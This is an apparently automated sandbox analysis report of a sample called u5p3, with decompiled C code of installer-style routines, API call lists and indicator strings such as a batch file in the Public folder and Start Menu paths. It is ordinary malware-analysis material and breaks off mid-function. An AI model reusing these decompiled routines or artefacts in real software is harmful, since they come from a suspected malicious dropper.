                                                        0x10001d6d
                                                        0x00000000
                                                        0x10001d6d
                                                        0x1000204d
                                                        0x10002050
                                                        0x10002057
                                                        0x10002057
                                                        0x1000205b
                                                        0x1000206f
                                                        0x1000206f
                                                        0x10002072
                                                        0x10002076
                                                        0x100020be
                                                        0x100020c1
                                                        0x100020c5
                                                        0x00000000
                                                        0x100020c5
                                                        0x10002078
                                                        0x1000207c
                                                        0x00000000
                                                        0x00000000
                                                        0x1000207e
                                                        0x10002085
                                                        0x10002085
                                                        0x1000208b
                                                        0x1000208e
                                                        0x100020aa
                                                        0x10002090
                                                        0x10002099
                                                        0x1000209c
                                                        0x1000209c
                                                        0x00000000
                                                        0x1000208e
                                                        0x1000205d
                                                        0x10002060
                                                        0x10002064
                                                        0x00000000
                                                        0x00000000
                                                        0x10002066
                                                        0x00000000
                                                        0x10002066
                                                        0x10002052
                                                        0x10002055
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10002055
                                                        0x10001cf8
                                                        0x10001cf8
                                                        0x10001cf9
                                                        0x10001e29
                                                        0x10001e29
                                                        0x10001e2e
                                                        0x10001e31
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e3e
                                                        0x00000000
                                                        0x10001fe5
                                                        0x10001fe8
                                                        0x10001feb
                                                        0x10001feb
                                                        0x10001fec
                                                        0x10001fed
                                                        0x10001ff0
                                                        0x10001ff3
                                                        0x10001ff6
                                                        0x00000000
                                                        0x00000000
                                                        0x10001ff8
                                                        0x10001ff8
                                                        0x10001ffc
                                                        0x10002014
                                                        0x10002017
                                                        0x10002021
                                                        0x00000000
                                                        0x10002021
                                                        0x10001ffe
                                                        0x10001ffe
                                                        0x10002001
                                                        0x00000000
                                                        0x00000000
                                                        0x10002003
                                                        0x10002006
                                                        0x10002008
                                                        0x10002009
                                                        0x10002009
                                                        0x10002009
                                                        0x1000200a
                                                        0x1000200d
                                                        0x10002010
                                                        0x10002011
                                                        0x10001feb
                                                        0x10001fec
                                                        0x10001fed
                                                        0x10001ff0
                                                        0x10001ff3
                                                        0x10001ff6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001ff6
                                                        0x00000000
                                                        0x10001e85
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e91
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e78
                                                        0x10001e7c
                                                        0x10001e80
                                                        0x00000000
                                                        0x00000000
                                                        0x10001fb6
                                                        0x10001fba
                                                        0x00000000
                                                        0x00000000
                                                        0x10001fc0
                                                        0x10001fc9
                                                        0x10001fd0
                                                        0x10001fd8
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f53
                                                        0x10001f53
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e9a
                                                        0x00000000
                                                        0x00000000
                                                        0x10002040
                                                        0x00000000
                                                        0x00000000
                                                        0x10002030
                                                        0x00000000
                                                        0x00000000
                                                        0x10002034
                                                        0x00000000
                                                        0x00000000
                                                        0x1000203c
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f76
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f5b
                                                        0x10001f5d
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f7e
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f63
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f67
                                                        0x00000000
                                                        0x00000000
                                                        0x10002038
                                                        0x10002042
                                                        0x10002042
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f86
                                                        0x10001f8a
                                                        0x10001f8f
                                                        0x10001f92
                                                        0x10001f93
                                                        0x10001f96
                                                        0x10001f9c
                                                        0x10001f9c
                                                        0x00000000
                                                        0x00000000
                                                        0x10002028
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f6b
                                                        0x10001f6e
                                                        0x10001f70
                                                        0x00000000
                                                        0x00000000
                                                        0x10001ea1
                                                        0x10001ea1
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f7a
                                                        0x10001f80
                                                        0x10001f80
                                                        0x10001ea3
                                                        0x10001ea3
                                                        0x10001ea6
                                                        0x10001ead
                                                        0x10001eb0
                                                        0x10001eb2
                                                        0x10001eb4
                                                        0x10001eb5
                                                        0x10001eb9
                                                        0x10001ebc
                                                        0x10001ec2
                                                        0x10001ec8
                                                        0x10001ec8
                                                        0x10001eca
                                                        0x10001eca
                                                        0x10001ecd
                                                        0x10001ed3
                                                        0x10001ed5
                                                        0x10001ed9
                                                        0x10001ede
                                                        0x10001ede
                                                        0x10001ee0
                                                        0x10001ee0
                                                        0x10001ee3
                                                        0x10001ee6
                                                        0x10001eef
                                                        0x10001ef5
                                                        0x10001ef8
                                                        0x10001ef8
                                                        0x10001efa
                                                        0x10001efd
                                                        0x10001f03
                                                        0x00000000
                                                        0x10001f03
                                                        0x10001ec4
                                                        0x10001ec6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e45
                                                        0x10001e4b
                                                        0x10001e4e
                                                        0x10001e50
                                                        0x10001e50
                                                        0x10001e53
                                                        0x10001e57
                                                        0x10001e64
                                                        0x10001e66
                                                        0x10001e6c
                                                        0x10001e6c
                                                        0x10001e6c
                                                        0x00000000
                                                        0x00000000
                                                        0x10001fa4
                                                        0x10001fa8
                                                        0x10001fad
                                                        0x10001fb0
                                                        0x10001f09
                                                        0x10001f09
                                                        0x10001f0b
                                                        0x00000000
                                                        0x00000000
                                                        0x10001f11
                                                        0x10001f11
                                                        0x10001f15
                                                        0x10001f1c
                                                        0x10001f40
                                                        0x10001f40
                                                        0x10001f44
                                                        0x10001f46
                                                        0x10001f49
                                                        0x10001f49
                                                        0x10001f4c
                                                        0x10001f4c
                                                        0x00000000
                                                        0x10001f44
                                                        0x10001f21
                                                        0x10001f24
                                                        0x10001f24
                                                        0x10001f2b
                                                        0x10001f2d
                                                        0x10001f30
                                                        0x10001f37
                                                        0x10001f38
                                                        0x10001f3e
                                                        0x10001f3e
                                                        0x00000000
                                                        0x10001f3e
                                                        0x10001f32
                                                        0x10001f35
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e3e
                                                        0x10001cff
                                                        0x10001cff
                                                        0x10001d00
                                                        0x10001e26
                                                        0x00000000
                                                        0x10001e26
                                                        0x10001d06
                                                        0x10001d07
                                                        0x00000000
                                                        0x00000000
                                                        0x10001d0f
                                                        0x10001d0f
                                                        0x10001d12
                                                        0x10001d5d
                                                        0x00000000
                                                        0x10001d5d
                                                        0x10001d14
                                                        0x10001d14
                                                        0x10001d17
                                                        0x10001d41
                                                        0x10001d44
                                                        0x10001d47
                                                        0x10001e18
                                                        0x10001e18
                                                        0x10001e18
                                                        0x10001d4d
                                                        0x10001d4d
                                                        0x10001d4d
                                                        0x10001e1e
                                                        0x00000000
                                                        0x10001e1e
                                                        0x10001d1a
                                                        0x10001d1a
                                                        0x10001d1b
                                                        0x10001d3e
                                                        0x10001d40
                                                        0x10001d40
                                                        0x00000000
                                                        0x10001d40
                                                        0x10001d1d
                                                        0x10001d1d
                                                        0x10001d20
                                                        0x10001d3a
                                                        0x00000000
                                                        0x10001d3a
                                                        0x10001d22
                                                        0x10001d22
                                                        0x10001d25
                                                        0x10001d36
                                                        0x00000000
                                                        0x10001d36
                                                        0x10001d27
                                                        0x10001d27
                                                        0x10001d28
                                                        0x10001d32
                                                        0x00000000
                                                        0x10001d32
                                                        0x10001d2b
                                                        0x10001d2c
                                                        0x00000000
                                                        0x00000000
                                                        0x10001d2e
                                                        0x00000000
                                                        0x10001d2e
                                                        0x00000000
                                                        0x10001bdd
                                                        0x10001b7f
                                                        0x10001b82
                                                        0x10001bb1
                                                        0x10001bb5
                                                        0x10001bbc
                                                        0x10001bc3
                                                        0x10001bc6
                                                        0x10001bc9
                                                        0x00000000
                                                        0x10001bc9
                                                        0x10001b84
                                                        0x10001b85
                                                        0x10001ba0
                                                        0x10001ba7
                                                        0x10001baa
                                                        0x00000000
                                                        0x10001baa
                                                        0x10001b8a
                                                        0x00000000
                                                        0x10001b90
                                                        0x10001b90
                                                        0x10001b97
                                                        0x00000000
                                                        0x10001b97
                                                        0x10001b8a
                                                        0x10001d83
                                                        0x10001d88
                                                        0x10001d8d
                                                        0x10001d91
                                                        0x100021c5
                                                        0x100021cb
                                                        0x10001da3
                                                        0x10001da5
                                                        0x10001da6
                                                        0x100020ee
                                                        0x100020ee
                                                        0x100020f1
                                                        0x100020f4
                                                        0x10002111
                                                        0x10002117
                                                        0x10002119
                                                        0x1000211f
                                                        0x10002136
                                                        0x10002136
                                                        0x10002136
                                                        0x10002143
                                                        0x10002149
                                                        0x1000214c
                                                        0x10002152
                                                        0x10002154
                                                        0x10002158
                                                        0x1000215a
                                                        0x10002161
                                                        0x10002166
                                                        0x10002169
                                                        0x1000216b
                                                        0x10002170
                                                        0x10002182
                                                        0x10002182
                                                        0x10002170
                                                        0x10002169
                                                        0x10002158
                                                        0x10002188
                                                        0x1000218b
                                                        0x10002195
                                                        0x1000219d
                                                        0x100021aa
                                                        0x100021b0
                                                        0x100021b3
                                                        0x100020e3
                                                        0x100020e3
                                                        0x00000000
                                                        0x100020e3
                                                        0x100021b9
                                                        0x100021bf
                                                        0x100021bf
                                                        0x00000000
                                                        0x00000000
                                                        0x100021c1
                                                        0x100021c1
                                                        0x100021c1
                                                        0x100021c1
                                                        0x00000000
                                                        0x1000218d
                                                        0x1000218d
                                                        0x10002193
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10002193
                                                        0x1000218b
                                                        0x10002122
                                                        0x10002128
                                                        0x1000212a
                                                        0x10002130
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10002130
                                                        0x100020f6
                                                        0x100020fd
                                                        0x10002103
                                                        0x10002109
                                                        0x00000000
                                                        0x10002109
                                                        0x10001dac
                                                        0x10001dad
                                                        0x100020cd
                                                        0x100020cd
                                                        0x100020d3
                                                        0x100020d6
                                                        0x00000000
                                                        0x00000000
                                                        0x100020dd
                                                        0x100020e2
                                                        0x00000000
                                                        0x100020e2
                                                        0x10001db4
                                                        0x00000000
                                                        0x00000000
                                                        0x10001dba
                                                        0x10001dba
                                                        0x10001dc3
                                                        0x10001dc8
                                                        0x10001dce
                                                        0x00000000
                                                        0x00000000
                                                        0x10001dd4
                                                        0x10001de1
                                                        0x10001de7
                                                        0x10001df1
                                                        0x10001df7
                                                        0x10001dff
                                                        0x10001e0f
                                                        0x00000000
                                                        0x10001e0f

                                                        APIs
                                                          • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                        • lstrcpyW.KERNEL32 ref: 10001C6C
                                                        • lstrcpyW.KERNEL32 ref: 10001C76
                                                        • GlobalFree.KERNEL32 ref: 10001C89
                                                        • GlobalFree.KERNEL32 ref: 10001D83
                                                        • GlobalFree.KERNEL32 ref: 10001D88
                                                        • GlobalFree.KERNEL32 ref: 10001D8D
                                                        • GlobalFree.KERNEL32 ref: 10001F38
                                                        • lstrcpyW.KERNEL32 ref: 1000209C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.841534468.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.841525683.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841545533.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841553679.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$lstrcpy$Alloc
                                                        • String ID: Nqt@hqt
                                                        • API String ID: 4227406936-2613664712
                                                        • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                        • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                        • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                        • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004046B0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E004046B0(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226c0; // 0x72fd3c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405892(0x3fb, _t146);
					E004064E0(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405892(0x3fb, _t146);
							if(E00405C25(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040624C(0x4216b8, _t146);
							_t87 = E00406626(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040624C(0x4216b8, _t146);
								_t89 = E00405BC8(0x4216b8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216b8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216b8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216b8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405B69(0x4216b8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216b8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B4D(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291dc + 0x10)) != _t158) {
									E00404B35(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216a8);
									} else {
										E00404A6C(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404203(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236d8 == _t158) {
									E00404609();
								}
								 *0x4236d8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x4236e8;
							_v60 = E00404A06;
							_v56 = _t146;
							_v68 = E0040626E(_t146, 0x4236e8, _t167, 0x421ec0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B1D(_t146);
								_t125 =  *((intOrPtr*)( *0x42a214 + 0x11c));
								if( *((intOrPtr*)( *0x42a214 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth") {
									E0040626E(_t146, 0x4236e8, _t167, 0, _t125);
									if(lstrcmpiW(0x4281a0, 0x4236e8) != 0) {
										lstrcatW(_t146, 0x4281a0);
									}
								}
								 *0x4236d8 =  *0x4236d8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405B94(_t146) != 0 && E00405BC8(_t146) == 0) {
						E00405B1D(_t146);
					}
					 *0x4291d8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004041E1(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004041E1(_t167);
					E00404216(_t166);
					_t138 = E00406626(7);
					if(_t138 == 0) {
						L53:
						return E00404248(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                        0x004046b0
                                                        0x004046b6
                                                        0x004046bc
                                                        0x004046c9
                                                        0x004046d7
                                                        0x004046da
                                                        0x004046e2
                                                        0x004046e8
                                                        0x004046e8
                                                        0x004046f4
                                                        0x004046f7
                                                        0x00404765
                                                        0x0040476c
                                                        0x00404843
                                                        0x0040484a
                                                        0x00404859
                                                        0x00404859
                                                        0x0040485d
                                                        0x00404867
                                                        0x00404874
                                                        0x00404876
                                                        0x00404876
                                                        0x00404884
                                                        0x0040488b
                                                        0x00404892
                                                        0x00404895
                                                        0x004048d1
                                                        0x004048d3
                                                        0x004048d9
                                                        0x004048de
                                                        0x004048e2
                                                        0x004048e4
                                                        0x004048e4
                                                        0x00404900
                                                        0x00000000
                                                        0x00404902
                                                        0x00404905
                                                        0x00404913
                                                        0x00404919
                                                        0x0040491a
                                                        0x0040491d
                                                        0x00404920
                                                        0x00000000
                                                        0x00404920
                                                        0x00404897
                                                        0x00404899
                                                        0x0040489d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040489f
                                                        0x0040489f
                                                        0x004048ac
                                                        0x004048b1
                                                        0x00000000
                                                        0x00000000
                                                        0x004048b5
                                                        0x004048b7
                                                        0x004048b7
                                                        0x004048c0
                                                        0x004048c2
                                                        0x004048c7
                                                        0x004048ca
                                                        0x004048cf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004048cf
                                                        0x0040492c
                                                        0x00404936
                                                        0x00404939
                                                        0x0040493c
                                                        0x00404943
                                                        0x00404943
                                                        0x00404945
                                                        0x00404945
                                                        0x0040494a
                                                        0x0040494c
                                                        0x00404954
                                                        0x0040495b
                                                        0x0040495d
                                                        0x00404968
                                                        0x00404968
                                                        0x0040495d
                                                        0x00404978
                                                        0x00404982
                                                        0x0040498a
                                                        0x004049a5
                                                        0x0040498c
                                                        0x00404995
                                                        0x00404995
                                                        0x0040498a
                                                        0x004049aa
                                                        0x004049af
                                                        0x004049b4
                                                        0x004049bd
                                                        0x004049bd
                                                        0x004049c6
                                                        0x004049c8
                                                        0x004049c8
                                                        0x004049d4
                                                        0x004049dc
                                                        0x004049e6
                                                        0x004049e6
                                                        0x004049eb
                                                        0x00000000
                                                        0x004049eb
                                                        0x00404895
                                                        0x0040484c
                                                        0x00404853
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404853
                                                        0x00404772
                                                        0x0040477b
                                                        0x00404795
                                                        0x0040479a
                                                        0x004047a4
                                                        0x004047ab
                                                        0x004047b7
                                                        0x004047ba
                                                        0x004047bd
                                                        0x004047c4
                                                        0x004047cc
                                                        0x004047cf
                                                        0x004047d3
                                                        0x004047da
                                                        0x004047e2
                                                        0x0040483c
                                                        0x004047e4
                                                        0x004047e5
                                                        0x004047ec
                                                        0x004047f6
                                                        0x004047fe
                                                        0x0040480b
                                                        0x0040481f
                                                        0x00404823
                                                        0x00404823
                                                        0x0040481f
                                                        0x00404828
                                                        0x00404835
                                                        0x00404835
                                                        0x004047e2
                                                        0x00000000
                                                        0x0040479a
                                                        0x00404788
                                                        0x00000000
                                                        0x00000000
                                                        0x0040478e
                                                        0x00000000
                                                        0x004046f9
                                                        0x00404706
                                                        0x0040470f
                                                        0x0040471c
                                                        0x0040471c
                                                        0x00404723
                                                        0x00404729
                                                        0x00404732
                                                        0x00404735
                                                        0x00404738
                                                        0x00404740
                                                        0x00404743
                                                        0x00404746
                                                        0x0040474c
                                                        0x00404753
                                                        0x0040475a
                                                        0x004049f1
                                                        0x00404a03
                                                        0x00404760
                                                        0x00404763
                                                        0x00000000
                                                        0x00404763
                                                        0x0040475a

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 004046FF
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404729
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 004047DA
                                                        • CoTaskMemFree.OLE32(00000000), ref: 004047E5
                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,004236E8,00000000,?,?), ref: 00404817
                                                        • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 00404823
                                                        • SetDlgItemTextW.USER32 ref: 00404835
                                                          • Part of subcall function 00405892: GetDlgItemTextW.USER32(?,?,00000400,0040486C), ref: 004058A5
                                                          • Part of subcall function 004064E0: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\u5p3.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,7476FAA0,00403589,?,00000006,00000008,0000000A), ref: 00406543
                                                          • Part of subcall function 004064E0: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
                                                          • Part of subcall function 004064E0: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\u5p3.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,7476FAA0,00403589,?,00000006,00000008,0000000A), ref: 00406557
                                                          • Part of subcall function 004064E0: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\u5p3.bat" ,00403318,C:\Users\user\AppData\Local\Temp\,7476FAA0,00403589,?,00000006,00000008,0000000A), ref: 0040656A
                                                        • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 004048F8
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404913
                                                          • Part of subcall function 00404A6C: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
                                                          • Part of subcall function 00404A6C: wsprintfW.USER32 ref: 00404B16
                                                          • Part of subcall function 00404A6C: SetDlgItemTextW.USER32 ref: 00404B29
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade, xrefs: 00404811, 00404816, 00404821
                                                        • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 00404800
                                                        • 6B, xrefs: 004047AD
                                                        • A, xrefs: 004047D3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$6B
                                                        • API String ID: 2624150263-183444030
                                                        • Opcode ID: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                                        • Instruction ID: 3caff43168dd0751864d44f5cbb06f26c6104a46936f7057387f9fb8a2ee2b83
                                                        • Opcode Fuzzy Hash: b1d243ae95704861e4402fcc76362414c1757fd644608bb3aee2509e1b30c864
                                                        • Instruction Fuzzy Hash: DFA197F1A00209ABDB11AFA5CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 67%
                                                        			E004020FE() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405B94( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C37(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084dc, _t83, 1, 0x4084cc, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
